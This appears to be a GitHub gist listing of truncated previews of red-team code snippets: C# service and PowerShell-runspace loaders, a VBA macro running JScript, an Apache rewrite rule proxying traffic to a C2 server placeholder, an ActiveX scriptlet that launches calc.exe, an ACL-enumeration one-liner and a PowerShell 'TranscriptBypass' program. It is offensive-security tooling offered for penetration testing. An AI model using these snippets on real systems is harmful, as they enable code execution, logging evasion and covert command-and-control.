Ben Turner benpturner
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.ServiceProcess; | |
| namespace RedTeamingService | |
| { | |
| public partial class SystemService : ServiceBase | |
| { | |
| public static int pid = 0; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System.ServiceProcess; | |
| using System.Diagnostics; | |
| public class MyService : ServiceBase | |
| { | |
| public MyService() | |
| { | |
| ServiceName = "runner"; | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| ////////////////////////////////////////////////////////////////////// | |
| BOOLEAN WINAPI DllMain( | |
| IN HINSTANCE /*hDllHandle*/, | |
| IN DWORD nReason, | |
| IN LPVOID /*Reserved*/) | |
| { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Sub RunMe() | |
| ' | |
| ' Menu -> Tool -> References -> Microsoft Script Control 1.0 & Enable by Clicking it | |
| ' | |
| ' | |
| Dim jsObj As New ScriptControl | |
| Dim Result As Integer | |
| jsObj.Language = "JScript" | |
| With jsObj |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Text; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| using System.Collections.ObjectModel; | |
| using System.Management.Automation; | |
| using System.Management.Automation.Runspaces; | |
| using System.EnterpriseServices; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $serverport = '$port' | |
| $httpresponse = ' | |
| <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> | |
| <html><head> | |
| <title>404 Not Found</title> | |
| </head><body> | |
| <h1>Not Found</h1> | |
| <p>The requested URL was not found on this server.</p> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # whitelist need to be formatted like so | |
| # 104.44.44.44 - | |
| # 104.33.33.33 - | |
| RewriteMap ips txt:/opt/whitelist.txt | |
| RewriteCond ${ips:%%{REMOTE_ADDR}|NOTFOUND} !NOTFOUND | |
| RewriteCond %%{HTTP_USER_AGENT} "Mozilla\/5\.0 \(Windows NT 6\.1; WOW64\) AppleWebKit\/537\.36 \(KHTML, like Gecko\)" [NC] | |
| RewriteRule ^/news/(.*) https://yourc2server.com/news/$1 [NC,P] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <cOmPoNeNt><sCRipT> | |
| a=new ActiveXObject("Shell.Application").ShellExecute("calc.exe","","","open","0"); | |
| </sCRipT></cOmPoNeNt> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Get-ChildItem C:\ -Recurse -ErrorAction SilentlyContinue | ForEach-Object {try {Get-Acl -Path $_.FullName | Select-Object pschildname,pspath,accesstostring} catch{}}|Export-Csv C:\temp\acl.csv -NoTypeInformation |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.ObjectModel; | |
| using System.Management.Automation; | |
| using System.Management.Automation.Runspaces; | |
| namespace TranscriptBypass | |
| { | |
| // Compiling with CSC.exe v4.0.30319 or v3.5 | |
| // C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Temp\posh.exe C:\Temp\posh.cs /reference:System.Management.Automation.dll | |
| // C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /out:c:\temp\posh.exe C:\temp\posh.cs /reference:System.Management.Automation.dll |
OlderNewer